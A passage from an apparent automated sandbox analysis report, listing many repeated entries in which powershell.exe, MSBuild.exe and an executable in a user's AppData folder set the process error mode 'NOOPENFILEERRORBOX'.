            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
